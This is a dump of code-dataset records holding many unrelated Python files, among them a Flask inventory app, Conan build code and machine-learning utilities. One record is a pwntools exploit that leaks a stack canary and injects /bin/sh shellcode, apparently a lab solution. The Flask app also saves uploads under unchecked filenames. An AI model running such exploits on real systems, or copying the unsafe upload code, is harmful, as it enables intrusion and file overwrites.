if(int(request.form.get(\"quantidade\")) < 0 or int(request.form.get(\"quantidade\")) > int(planilha.cell(rm.row, 2).value) or request.form.get('quantidade') == ''):\n return u'''\n \n '''\n else:\n dateToday = datetime.datetime.today()\n #Registra uma transação na planilha transações com o valor do produto, a quantidade, o preço, data e o horário\n transacoes.append_row([request.form.get(\"nome\"), request.form.get(\"quantidade\"), str(float(request.form.get(\"preço\")) * int(request.form.get(\"quantidade\"))), str(dateToday.day) + \"/\" + str(dateToday.month) + \"/\" + str(dateToday.year), str(dateToday.hour) + \":\" + str(dateToday.minute) + \":\" + str(dateToday.second), str(dateToday.day), str(dateToday.month), str(dateToday.year)])\n\n #Atualiza a célula com o valor da subtração do valor que já tem na célula com o valor que o usuário quer retirar\n planilha.update_cell(rm.row, 2, int(planilha.cell(rm.row, 2).value) - int(request.form.get(\"quantidade\")))\n\n # Verifica se a quantidade atual está abaixo do valor limite definido pelo usuário (por enquanto o limite é fixo kkkkk)\n if int(planilha.cell(rm.row, 2).value) < 5:\n return render_template(\"respostaEstoque.html\", retorno = \"Operação concluida, o total da venda foi de R$: \" + str(round(int(request.form.get(\"quantidade\")) * float(request.form.get(\"preço\")), 1)) + \"! Atenção! O produto está abaixo do limite especificado\")\n\n else:\n return render_template(\"respostaEstoque.html\", retorno = \"Operação concluida, o total da venda foi de R$: \" + str(round(int(request.form.get(\"quantidade\")) * float(request.form.get(\"preço\")), 1)) + \"!\")\n\n# Rotas para editar dados da planilha\n@app.route('/popupEdition', methods=['POST'])\ndef popupEdition():\n item = planilha.find(request.form.get('edit'))\n volume = planilha.cell(item.row, 4).value\n\n # Utilizando o laço for para capturar apenas o valor do volume\n valor = ''\n for num in volume:\n if num.isnumeric() == True:\n valor += num\n\n return render_template('editar.html',\n planilha_completa = planilha.get_all_values(),\n nome = item.value,\n quantidade = planilha.cell(item.row, 2).value,\n preço = planilha.cell(item.row, 3).value,\n volume = volume,\n valor = valor,\n corpo = planilha.cell(item.row, 5).value,\n imagem = planilha.cell(item.row, 6).value\n )\n\n# Nessa rota ocorrerá a edição dos itens\n@app.route('/editar', methods=['POST'])\ndef editar():\n conteudo = [\n 'nome',\n 'quantidade',\n 'preço',\n 'valor',\n 'área do corpo',\n 'imagem'\n ]\n\n # Capturando a linha certa pelo nome do item\n linha = planilha.find(request.form.get('edition')).row\n\n # Atualizando a planilha com os novos valores\n for pos, item in enumerate(conteudo):\n if pos == 3:\n volume = request.form.get(item) + request.form.get('volume')\n planilha.update_cell(linha, pos + 1, volume)\n elif pos == 5:\n if request.files['imagem'].filename != '':\n request.files['imagem'].save(os.path.join(app.config['UPLOAD_FOLDER'], request.files['imagem'].filename))\n planilha.update_cell(linha, pos + 1, request.files['imagem'].filename)\n else:\n pass\n else:\n planilha.update_cell(linha, pos + 1, request.form.get(item))\n\n return u'''\n \n '''\n\n# Rotas para Inserir Produto\n@app.route('/inserir')\ndef inserir():\n return render_template(\"incluirProduto.html\")\n\n# Rota de Captura das Informações para adicionar na planilha\n@app.route('/recebendo_dados', methods=['POST'])\ndef add():\n arr = [\n 'nome', \n 'quantidade', \n 'preço',\n 'valor',\n 'área do corpo',\n 'imagem'\n ]\n # Laço For para 
adicionar os dados dentro da minha lista row.\n row = []\n for pos, n in enumerate(arr):\n item = request.form.get(n)\n if pos == 3:\n item = request.form.get(n) + request.form.get('volume')\n if pos == 5:\n if request.files[\"imagem\"].filename != \"\":\n request.files[\"imagem\"].save(os.path.join(app.config[\"UPLOAD_FOLDER\"], request.files[\"imagem\"].filename))\n item = request.files[\"imagem\"].filename\n else:\n pass\n row.append(item)\n \n # Laço For para verificar se os dados que o usuários inseriu é compatível com alguma linha dentro da planilha;\n # Caso seja compatível, ele apenas irá alterar a quantidade adicionada.\n same = contsame = 0\n for pos, linha in enumerate(planilha.get_all_values()): # Array de linhas\n for cell in range(0, 6):\n if linha[cell] == linha[1] or linha[cell] == linha[2] or linha[cell] == linha[5]:\n continue\n elif unidecode(linha[cell]).lower().strip() == unidecode(row[cell]).lower().strip():\n same += 1\n \n # Caso seja igual a 4, significa dizer que as 4 colunas de uma linha eram iguais aos dados que o usuário inseriu;\n # Então quer dizer que a linha já existe na planilha, portanto, o produto não será adicionado.\n if same == 3:\n contsame += 1\n return u\"\"\"\n \n \"\"\"\n else:\n same = 0\n \n # contsame == 0 significa que não há nenhum item na planilha igual ao inserido pelo usuário, logo, será um novo item\n if contsame == 0:\n index = len(planilha.get_all_values()) + 1\n planilha.insert_row(row, index)\n return u\"\"\"\n \n \"\"\"\n\n@app.route('/estoque')\ndef estoque():\n return render_template('estoque.html', planilha_completa = planilha.get_all_values())\n\n@app.route('/transacoes')\ndef transacoess():\n return render_template(\"transacoes.html\", transacoes = reversed(transacoes.get_all_values()))\n\n@app.route(\"/pesquisa\", methods=['POST'])\ndef pesquisa():\n pesq = []\n for produto in planilha.get_all_values():\n if unidecode(request.form.get(\"produto\")).lower().strip() in unidecode(produto[0]).lower().strip():\n pesq.append(produto)\n if pesq != []:\n return render_template(\"estoque.html\", planilha_completa = pesq)\n return u\"\"\"\n \n \"\"\" \n \n\n@app.route(\"/sobre\")\ndef sobre():\n return render_template(\"sobre.html\")\n \n\napp.run(debug=True, use_reloader=True)","sub_path":"Controle de estoque/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"176514557","text":"from angr_helper.angr_proj import AngrProj\nfrom angr_helper.function_parse import FunctionParse\nfrom angr_helper.fw_entry_state import FwEntryState\nfrom utils.db.mongodb.file_cache_dao import FileCacheDAO\n\n\nclass FilesService:\n\n @staticmethod\n def bin_state_info(file_id):\n # 查找是否已有缓存结果,如有,不再做重复解析,直接返回缓存结果\n state_dict = FileCacheDAO.fetch_state_info(file_id)\n if state_dict is not None:\n return state_dict\n\n # 通过 project 快速解析文件\n angr_proj = AngrProj(file_id)\n\n # 从 project 中取 entry 对象\n entry_state = FwEntryState(angr_proj)\n\n # 读取状态机信息\n state_dict = entry_state.entry_info()\n\n # 在数据库中缓存解析结果\n FileCacheDAO.save_state_info(file_id, state_dict)\n\n return state_dict\n\n @staticmethod\n def functions_list(file_id):\n # 查找是否已有缓存结果,如有,不再做重复解析,直接返回缓存结果\n funcs_list = FileCacheDAO.fetch_functions(file_id)\n if funcs_list is not None:\n return funcs_list\n else:\n return []\n\n # # 通过 project 快速解析文件\n # angr_proj = AngrProj(file_id)\n # funcs_list = FunctionParse.functions_extract(angr_proj.proj)\n\n # 在数据库中缓存解析结果\n # 
FileCacheDAO.save_functions(file_id, funcs_list)\n\n # return funcs_list\n","sub_path":"fw_analyze/service/files_service.py","file_name":"files_service.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"183836159","text":"# cs215 ; Unit 1: A Social Network Magic Trick ; 15\n# counting steps in naive as a function of a\n\ndef naive(a, b):\n x = a\n y = b\n z = 0\n while x > 0:\n z = z + y\n x = x - 1\n return z\n\ndef time(a):\n # The number of steps it takes to execute naive(a, b)\n # as a function of a\n steps = 0\n # your code here\n return steps","sub_path":"cs215/Unit 1 A Social Network Magic Trick/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"245876744","text":"from myimports import *\nfrom split_training_testing import *\n#---------------------------------------------------------------------------------------\n# input_pipeline(filename, path): prepares a batch of features and labels for training\n#\n# parameters: filename - the file to be batched into the model\n# path - the folder where filename resides\n#\n# returns: feature_batch - a batch of features to train or test on\n# label_batch - a batch of labels related to the feature_batch\n#\n#---------------------------------------------------------------------------------------\ndef input_pipeline(filename, path):\n\n preprocessed_tz_scans = []\n feature_batch = []\n label_batch = []\n \n #Load a batch of preprocessed tz scans\n preprocessed_tz_scans = np.load(os.path.join(path, filename))\n \n #Shuffle to randomize for input into the model\n np.random.shuffle(preprocessed_tz_scans)\n \n # separate features and labels\n for example_list in preprocessed_tz_scans:\n for example in example_list:\n feature_batch.append(example[0])\n label_batch.append(example[1])\n \n feature_batch = np.asarray(feature_batch, dtype=np.float32)\n label_batch = np.asarray(label_batch, dtype=np.float32)\n \n return feature_batch, label_batch\n''' \n# unit test ------------------------------------------------------------------------\ntrain_set, test_set = get_train_test_file_list()\nprint ('Train Set -----------------------------')\nfor f_in in train_set:\n print(\"In train set:{0}\".format(f_in))\n feature_batch, label_batch = input_pipeline(f_in, PREPROCESSED_DATA_FOLDER)\n print (' -> features shape {}:{}:{}'.format(len(feature_batch), \n len(feature_batch[0]), \n len(feature_batch[0][0])))\n print (' -> labels shape {}:{}'.format(len(label_batch), len(label_batch[0])))\n \nprint ('Test Set -----------------------------')\nfor f_in in test_set:\n print(\"In test set:{0}\".format(f_in))\n feature_batch, label_batch = input_pipeline(f_in, PREPROCESSED_DATA_FOLDER)\n print (' -> features shape {}:{}:{}'.format(len(feature_batch), \n len(feature_batch[0]), \n len(feature_batch[0][0])))\n print (' -> labels shape {}:{}'.format(len(label_batch), len(label_batch[0])))\n'''\n#feature_batch, label_batch = input_pipeline(filename=\"preprocessed_TSA_scans-tz17-250-250-b10.npy\", path=PREPROCESSED_DATA_FOLDER)\n#print (' -> features shape {}:{}:{}'.format(len(feature_batch), \n# len(feature_batch[0]), \n# len(feature_batch[0][0])))\n#print (' -> labels shape {}:{}'.format(len(label_batch), len(label_batch[0])))\n#print (' -> labels {}'.format(label_batch))\n#print (' -> labels 
{}'.format(feature_batch[0]))\n","sub_path":"generate_input_pipeline.py","file_name":"generate_input_pipeline.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"173758727","text":"import xml.etree.ElementTree as et\nimport os.path\n'''\n\tget the \n'''\nclass cataloger():\n\tmusic_file = None\n\tfile = None\n\tdef __init__(self):\n\t\tfile = et.Element('Music Library')\n\t\tmusic_file = et.ElementTree(file)\n\t\tpass\n\tdef start_cataloging(self, entry_point):\n\t\tfor directory in os.listdir(entry_point):\n\t\t\tif os.path.isdir(entry_point+'\\\\'+directory) == True:\n\t\t\t\tself.start_cataloging(entry_point+'\\\\'+directory)\n\t\t\telif os.path.isfile(entry_point+'\\\\'+directory) == True:\n\t\t\t\tself.write_xml_data(entry_point+'\\\\'+directory, directory)\n\t\tself.finish()\n\n\tdef write_xml_data(self, filepath, filename):\n\t\tsong = et.SubElement(file, 'song_name')\n\t\tsong.set('name', filename)\n\t\tet.SubElement(song,'filepath').text = filepath\n\tdef finish(self):\n\t\toutFile = open('homemade.xml', 'w')\n\t\tmusic_file.write(outFile)\nif __name__ == '__main__':\n\tcat = cataloger()\n\tcat.start_cataloging('C:\\\\Users\\\\vivacba\\\\Desktop\\\\Franco Stuff\\\\Time Bitmaps')\n","sub_path":"file_cataloger.py","file_name":"file_cataloger.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"521760010","text":"#!/usr/bin/env python2\n\nfrom pwn import *\n\n# fread reads 16 bytes without\n# appending a null terminator\n# send in 16 bytes (15 A's + newline)\n# printf prints string. Will print data\n# until it hits null terminator\n# it will print 15 * \"A\" + \"\\n\" + canary_value\n# returns the 8 bytes of the canary\ndef get_canary(p):\n p.recvline() #\"Enter as: \"\n p.sendline(\"A\"*15) \n p.recvline() #\"This is the 6447 ....\"\n return p.recvline()[:8]\n\n\ndef get_buff_addr(p):\n p.recvuntil(\"[\", drop=True)\n addr = p.recvuntil(\"]\", drop=True)\n return int(addr, 16)\n\n\ndef send_payload(p, payload):\n p.recvline()\n p.sendline(payload)\n\n\np = process('./shellcrack')\ncanary = get_canary(p)\nbuff_addr = get_buff_addr(p)\n\nshellcode = '''\n call drop\n .string \"/bin/sh\"\ndrop:\n pop ebx\n mov eax, 0x0b\n xor ecx, ecx\n xor edx, edx\n int 0x80\n'''\n\npayload = fit({\n 0: asm(shellcode),\n 0x44 - 0x14: canary,\n 0x44 + 4: p32(buff_addr) \n})\n\nsend_payload(p, payload)\n\np.interactive()\n","sub_path":"shellcode/shellcrack/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"201828213","text":"#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-\n\nimport re\n\nfrom collections import namedtuple\n\nfrom bes.system.check import check\nfrom bes.common.node import node\nfrom bes.common.tuple_util import tuple_util\nfrom bes.compat.StringIO import StringIO\nfrom bes.fs.file_util import file_util\nfrom bes.key_value.key_value_list import key_value_list\n\nfrom .recipe_error import recipe_error\nfrom .recipe_util import recipe_util\nfrom .recipe_data_manager import recipe_data_manager\n\nclass recipe(namedtuple('recipe', 'format_version, filename, enabled, properties, requirements, descriptor, instructions, steps, python_code, variables, data')):\n\n CHECK_UNKNOWN_PROPERTIES = True\n FORMAT_VERSION = 2\n\n MAGIC = 
'!rebuild.recipe!'\n \n def __new__(clazz, format_version, filename, enabled, properties, requirements,\n descriptor, instructions, steps, python_code, variables, data):\n check.check_int(format_version)\n check.check_recipe_enabled(enabled)\n if format_version != clazz.FORMAT_VERSION:\n raise recipe_error('Invalid recipe format_version %d' % (format_version), filename, 1)\n check.check_string(filename)\n check.check_string(python_code, allow_none = True)\n check.check_masked_value_list(variables, allow_none = True)\n check.check_masked_value_list(data, allow_none = True)\n return clazz.__bases__[0].__new__(clazz, format_version, filename, enabled,\n properties, requirements, descriptor,\n instructions, steps, python_code, variables,\n data)\n\n @property\n def name(self):\n return self.descriptor.name\n\n @property\n def version(self):\n return self.descriptor.version\n \n @property\n def upstream_version(self):\n return self.version.upstream_version\n \n @property\n def revision(self):\n return self.version.revision\n \n def __str__(self):\n return self.to_string()\n\n def to_string(self, depth = 0, indent = 2):\n return recipe_util.root_node_to_string(self._to_node(), depth = depth, indent = indent)\n \n def _to_node(self):\n 'A convenient way to make a recipe string is to build a graph first.'\n root = node('package %s %s %s' % (self.descriptor.name, self.descriptor.version.upstream_version, self.descriptor.version.revision))\n root.add_child('')\n if self.python_code:\n root.children.append(recipe_util.python_code_to_node(self.python_code))\n root.add_child('')\n if self.enabled:\n if self.enabled.expression.lower() not in [ '', 'true' ]:\n root.add_child('enabled=%s' % (self.enabled.expression))\n root.add_child('')\n if self.data:\n x = recipe_data_manager.from_masked_value_list(self.data)\n root.children.append(recipe_util.lines_to_node('data', str(x)))\n root.add_child('')\n if self.variables:\n root.children.append(recipe_util.variables_to_node('variables', self.variables))\n root.add_child('')\n if self.properties:\n root.children.append(self._properties_to_node(self.properties))\n root.add_child('')\n if self.requirements:\n root.children.append(recipe_util.requirements_to_node('requirements', self.requirements))\n root.add_child('')\n root.children.append(self._steps_to_node(self.steps))\n return root\n\n @classmethod\n def _properties_to_node(clazz, properties):\n properties_node = node('properties')\n for key in sorted([ key for key in properties.keys()]):\n clazz._property_to_node(properties_node, key, properties)\n return properties_node\n\n @classmethod\n def _property_to_node(clazz, properties_node, key, properties):\n assert isinstance(properties_node, node)\n assert key in properties\n value = properties[key]\n if key in [ 'export_compilation_flags_requirements', 'extra_cflags' ]:\n properties_node.children.append(clazz._system_specific_property_to_node(key, properties))\n elif key in [ 'download_url', 'pkg_config_name' ]:\n properties_node.children.append(node('%s=%s' % (key, value)))\n else:\n if clazz.CHECK_UNKNOWN_PROPERTIES:\n raise RuntimeError('Unknown property: %s' % (key))\n else:\n properties_node.children.append(node('%s=%s' % (key, value)))\n del properties[key]\n\n @classmethod\n def _system_specific_property_to_node(clazz, key, properties):\n assert key in properties\n value = properties[key]\n check.check_masked_value_list(value)\n child = node(key)\n for i in value:\n child.add_child(i)\n return child\n\n @classmethod\n def _steps_to_node(clazz, 
steps):\n result = node('steps')\n for step in steps:\n step_node = result.add_child(step.name)\n for value in step.values:\n if len(value.values) == 1 and value.values[0].mask is None:\n step_node.add_child(str(value))\n else:\n value_node = step_node.add_child(value.key)\n for masked_value in value.values:\n masked_value_node = value_node.add_child(masked_value.to_string(quote = False))\n step_node.add_child('')\n result.add_child('')\n return result\n\n @classmethod\n def _masked_value_list_to_node(clazz, key, mvl):\n result = node(key)\n for mv in mvl:\n result.add_child(mv.to_string())\n return result\n\n def resolve_variables(self, system):\n if not self.variables:\n return key_value_list()\n return self.variables.resolve(system, 'key_values')\n \n def resolve_data(self, system):\n if not self.data:\n return []\n result = []\n for value in self.data:\n if value.mask_matches(system):\n result.append(tuple(value.value.value))\n return result\n\n def save_to_file(self, filename):\n buf = StringIO()\n buf.write(self.MAGIC)\n buf.write('\\n')\n buf.write('\\n')\n buf.write(str(self))\n buf.write('\\n')\n file_util.save(filename, buf.getvalue())\n\n def clone(self, mutations = None):\n return tuple_util.clone(self, mutations = mutations)\n\n @classmethod\n def is_recipe(clazz, filename):\n 'Return True if filename is a valid recipe.'\n return recipe_util.file_starts_with_magic(filename, clazz.MAGIC)\n\n def find_step_values(self, step_name, value_name):\n for step in self.steps:\n if step_name in [ step.name, '*' ]:\n for value in step.values:\n if value.key == value_name:\n return value.values\n return None\n \ncheck.register_class(recipe, include_seq = False)\n","sub_path":"lib/rebuild/recipe/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":6432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"573262001","text":"import textwrap\nimport unittest\n\nfrom conans.test.utils.tools import TestClient, GenConanfile\n\n\nclass RequireOverrideTest(unittest.TestCase):\n\n def setUp(self):\n self.client = TestClient()\n\n def _save(self, req_method, requires):\n conanfile = GenConanfile()\n for req in requires:\n req2, override = req if isinstance(req, tuple) else (req, False)\n if not req_method:\n conanfile.with_require_plain(req2, override=override)\n else:\n conanfile.with_requirement_plain(req2, override=override)\n self.client.save({\"conanfile.py\": conanfile}, clean_first=True)\n\n def test_override(self):\n self.client.save({\"conanfile.py\": GenConanfile()})\n self.client.run(\"export . libA/1.0@user/channel\")\n # It is necessary to create libA/2.0 to have a conflict, otherwise it is missing\n self.client.run(\"export . libA/2.0@user/channel\")\n\n for req_method in (False, True):\n self._save(req_method, [\"libA/1.0@user/channel\"])\n self.client.run(\"export . libB/1.0@user/channel\")\n self._save(req_method, [\"libA/2.0@user/channel\"])\n self.client.run(\"export . 
libC/1.0@user/channel\")\n self._save(req_method, [\"libB/1.0@user/channel\", \"libC/1.0@user/channel\"])\n self.client.run(\"info .\", assert_error=True)\n self.assertIn(\"Conflict in libC/1.0@user/channel:\\n\"\n \" 'libC/1.0@user/channel' requires 'libA/2.0@user/channel' while \"\n \"'libB/1.0@user/channel' requires 'libA/1.0@user/channel'.\\n\"\n \" To fix this conflict you need to override the package 'libA' in your root\"\n \" package.\", self.client.out)\n\n self._save(req_method, [\"libB/1.0@user/channel\", \"libC/1.0@user/channel\",\n (\"libA/1.0@user/channel\", \"override\")])\n self.client.run(\"info .\")\n self.assertIn(\"libA/2.0@user/channel overridden\", self.client.out)\n\n def test_public_deps(self):\n client = TestClient()\n pkg2 = textwrap.dedent(\"\"\"\n from conans import ConanFile\n class Pkg(ConanFile):\n requires = (\"pkg/0.1@user/stable\", \"override\"),\n def package_info(self):\n self.output.info(\"PUBLIC PKG2:%s\" % self.cpp_info.public_deps)\n \"\"\")\n client.save({\"conanfile.py\": pkg2})\n client.run(\"create . pkg2/0.1@user/stable\")\n self.assertIn(\"pkg2/0.1@user/stable: PUBLIC PKG2:[]\", client.out)\n pkg3 = textwrap.dedent(\"\"\"\n from conans import ConanFile\n class Pkg(ConanFile):\n requires = \"pkg2/0.1@user/stable\", (\"pkg/0.1@user/stable\", \"override\")\n generators = \"cmake\"\n \"\"\")\n client.save({\"conanfile.py\": pkg3})\n client.run(\"install .\")\n self.assertIn(\"pkg2/0.1@user/stable: PUBLIC PKG2:[]\", client.out)\n conanbuildinfo = client.load(\"conanbuildinfo.cmake\")\n self.assertIn(\"set(CONAN_DEPENDENCIES pkg2)\", conanbuildinfo)\n","sub_path":"conans/test/functional/graph/require_override_test.py","file_name":"require_override_test.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"515947607","text":"import json\nimport urllib\nimport http.client\nimport certifi\n\ndef read_bing_key():\n bing_api_key = None\n\n try:\n with open('bing.key','r') as f:\n bing_api_key = f.readline()\n except:\n raise IOError('bing.key file not found')\n\n return bing_api_key\n\n\ndef run_query(search_terms):\n\n bing_api_key = read_bing_key()\n\n if not bing_api_key:\n raise KeyError(\"Bing Key Not Found\")\n\n host = \"api.cognitive.microsoft.com\"\n path = \"/bing/v7.0/search\"\n\n headers = {'Ocp-Apim-Subscription-Key': bing_api_key}\n\n conn = http.client.HTTPSConnection(host)\n\n query = urllib.parse.quote(search_terms)\n\n conn.request(\"GET\", path + \"?q=\" + query, headers=headers)\n\n response = conn.getresponse()\n\n headers = [k + \": \" + v for (k, v) in response.getheaders()\n if k.startswith(\"BingAPIs-\") or k.startswith(\"X-MSEdge-\")]\n\n result = response.read().decode(\"utf8\")\n\n results = []\n\n json_response = json.loads(result)\n\n for result in json_response['webPages']['value']:\n results.append({'title': result['name'], 'link': result['url'], 'summary': result['snippet']})\n return results\n\ndef main():\n search_item = input(\"Enter your query: \")\n\n r = run_query(search_item)\n print(r)\nif __name__ == '__main__':\n main()","sub_path":"rango/bing_search.py","file_name":"bing_search.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"40810748","text":"\nfrom matplotlib import pyplot as plt\n\nyears = [1950, 1960, 1970, 1980, 1990, 2000, 2010]\ngdp = [300.2, 543.3, 1075.9, 2862.5, 5979.6, 10289.7, 14958.3]\nplt.plot(years, gdp, 
color='green', marker='o', linestyle='solid')\nplt.title(\"Nominal GDP\")\nplt.ylabel(\"billions of $\")\n#plt.show()\n\nmovies = [\n    \"Annie Hall\",\n    \"Ben-Hur\",\n    \"Casablanca\",\n    \"Gandhi\",\n    \"West Side Story\"\n]\nnum_oscars = [5,11,3,8,10]\n\nxs = [i + 0.1 for i, _ in enumerate(movies)]\n\nprint(xs)\n\nplt.bar(xs, num_oscars)\n\nplt.ylabel(\"# of Academy Awards\")\nplt.title(\"My Favorite Movies\")\n\nplt.xticks([i + 0.5 for i, _ in enumerate(movies)], movies)\n\nplt.show()\n","sub_path":"practice_visualize.py","file_name":"practice_visualize.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"474442201","text":"from code.engineering import *\n\nEngineering.setupSpark(application = 'prep')\n\nmin = 100\ntop = None\n\nEngineering.numDoMeasurement(subset = 'train', iStep = f'')\n\nEngineering.allDoStandardize(subset = 'train', iStep = f'')\nEngineering.allDoStandardize(subset = 'tests', iStep = f'')\nEngineering.allDoStandardize(subset = 'valid', iStep = f'')\n\nEngineering.catDoMeasurement(subset = 'train', iStep = f'normed')\n\nEngineering.catMaskUncommons(subset = 'train', iStep = f'normed', min = min)\nEngineering.catMaskUncommons(subset = 'tests', iStep = f'normed', min = min)\nEngineering.catMaskUncommons(subset = 'valid', iStep = f'normed', min = min)\n\nEngineering.catDoCodeFeature(subset = 'train', iStep = f'normed.masked-{min:06d}', min = min, fit = True)\nEngineering.catDoCodeFeature(subset = 'tests', iStep = f'normed.masked-{min:06d}', min = min)\nEngineering.catDoCodeFeature(subset = 'valid', iStep = f'normed.masked-{min:06d}', min = min)\n\nEngineering.allDoPackFeature(subset = 'train', iStep = f'normed.masked-{min:06d}.encode', fit = True)\nEngineering.allDoPackFeature(subset = 'tests', iStep = f'normed.masked-{min:06d}.encode')\nEngineering.allDoPackFeature(subset = 'valid', iStep = f'normed.masked-{min:06d}.encode')\n","sub_path":"scripts/prep-000100.py","file_name":"prep-000100.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"605812347","text":"#-*- coding:utf8 -*-\nimport logging\nimport time\n\nclass Log(object):\n\n    file_name='log/'+time.strftime('%Y%m%d')+'.log'\n    create_time=time.strftime('%Y-%m-%d %H:%M:%S')\n\n    def __init__(self,db):\n        # Create a logger\n        self.logger = logging.getLogger('me')\n        self.logger.setLevel(logging.DEBUG)\n        # Create a handler that writes to the log file\n        fh = logging.FileHandler(self.file_name)\n        fh.setLevel(logging.DEBUG)\n        # Create another handler that outputs to the console\n        ch = logging.StreamHandler()\n        ch.setLevel(logging.DEBUG)\n        # Define the output format of the handlers\n        # formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n        formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n        fh.setFormatter(formatter)\n        ch.setFormatter(formatter)\n        # Attach the handlers to the logger\n        self.logger.addHandler(fh)\n        self.logger.addHandler(ch)\n        self.db=db\n\n    def debug(self,msg):\n        self.logger.debug(msg)\n\n    def info(self,program_name,platform_name,field,name,value,url):\n        self.db.add(\"crawler_log_info\",{\"program_name\":program_name,\"platform_name\":platform_name,\"field\":field,\"name\":name,\"value\":value,\"url\":url,\"create_time\":self.create_time})\n        self.logger.info('<%s>(%s) %s :%s[%s]=%s'%(program_name,platform_name,url,field,name,value))\n\n    def error(self,program_name,platform_name,content,url):\n
self.db.add(\"crawler_log_error\",{\"program_name\":program_name,\"platform_name\":platform_name,\"content\":content,\"url\":url,\"create_time\":self.create_time})\n self.logger.error('<%s>(%s) %s :%s'%(program_name,platform_name,url,content))\n\n def warn(self,msg):\n self.logger.warn(msg)\n\n def critical(self,msg):\n self.logger.critical(msg)","sub_path":"include/Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"401379594","text":"from db import db\nimport users_dao\n\ndef get_user_armies():\n user_id = users_dao.user_id()\n sql = \"SELECT * FROM Army WHERE Users.UserId = :userid AND Users.UserId = Match.User_id AND Match.MatchId = MatchArmy.Match_id AND MatchArmy.Army_id = Army.ArmyId\"\n result = db.session.execute(sql, {\"userid\":user_id})\n return result\n\ndef find_army(id):\n sql = \"SELECT * FROM Army WHERE Army.ArmyId=:army_id\"\n result = db.session.execute(sql, {\"army_id\":id})\n found_match = result.fetchone()\n return found_match\n\ndef create_new(armyname, armysize):\n try:\n sql = \"INSERT INTO Army (armyname, armysize) VALUES (:armyname,:armysize) RETURNING ArmyId\"\n result = db.session.execute(sql, {\"armyname\":armyname, \"armysize\":armysize})\n new_id = result.fetchone()[0]\n db.session.commit()\n except:\n return False\n return new_id\n\ndef delete(ArmyId):\n try:\n sql = \"UPDATE Units SET visible=0 WHERE ArmyId=:armyid\"\n db.session.execute(sql, {\"armyid\":ArmyId})\n db.session.commit()\n except:\n return False\n return True\n\ndef add_unit_to_army(ArmyId, UnitId):\n try:\n sql = \"INSERT INTO ArmyUnit (army_id, unit_id) VALUES (:armyid, unitid)\"\n db.session.execute()\n db.session.commit()\n except:\n return False\n return True\n\ndef remove_unit_from_army(ArmyId, UnitId):\n try:\n sql = \"DELETE * FROM ArmyUnit\" \\\n \"WHERE ArmyUnit.Army_id = :armyid\" \\\n \"AND ArmyUnit.Unit_id = :unitid\"\n db.session.execute(sql, {\"armyid\":ArmyId, \"unitid\":UnitId})\n db.session.commit()\n except:\n return False\n return True\n\n# Known issues\n# 1. 
If army has multiple entries of a particular unit, remove_unit will remove all of them","sub_path":"armies_dao.py","file_name":"armies_dao.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"521528824","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2020/12/31 4:01 PM\n# @File : compare_eval_result.py\n# @Author: johnson\n# @Contact : github: johnson7788\n# @Desc :\nimport json\nimport pandas as pd\nimport requests\n\ndef collect_data(devfile=\"../data_root_dir/newcos/dev.json\", eval_results=\"../output_root_dir/newcos/eval_results-newcos.json\"):\n    \"\"\"\n    Generate an excel file comparing the devfile with the results produced by main.trainer.py\n    :param devfile: training file, in the format [(text, keyword, labels),..]\n    :param eval_results: json file from the output directory generated by main.trainer.py [(predid, probability)]\n    :return:\n    \"\"\"\n    labels = [\"是\",\"否\"]  # \"yes\"/\"no\" class names taken from the dataset itself; kept as data values\n    with open(devfile) as f:\n        dev_data = json.load(f)\n    with open(eval_results) as f:\n        eval_data = json.load(f)\n    assert len(dev_data) == len(eval_data)\n    data = []\n    for d, res in zip(dev_data, eval_data):\n        one_data = {\"text\": d[0], \"keyword\":d[1], \"label\": d[2], \"predict\":labels[res[0]], \"probability\": format(res[1], \"0.3f\")}\n        data.append(one_data)\n    df = pd.DataFrame(data)\n    excel_file = \"result2.xlsx\"\n    writer = pd.ExcelWriter(excel_file, engine='xlsxwriter')\n    df.to_excel(writer)\n    writer.save()\n    print(f\"Saved to excel successfully: {excel_file}\")\n    return data\n\ndef compare_model(hostname='http://127.0.0.1:3314'):\n    \"\"\"\n    Send the collected data to the online service and compare accuracy; this compares against the online model, not our own model\n    :param hostname:\n    :return:\n    \"\"\"\n    url = hostname + '/lavector/rest/aspect-sentiment-batch'\n    headers = {'Content-Type': 'application/json'}\n    mydata = collect_data()\n    post_data = []\n    for d in mydata:\n        one = (d[\"text\"], [d[\"keyword\"]])\n        post_data.append(one)\n    data = {'channel': 'jd', 'data': post_data}\n    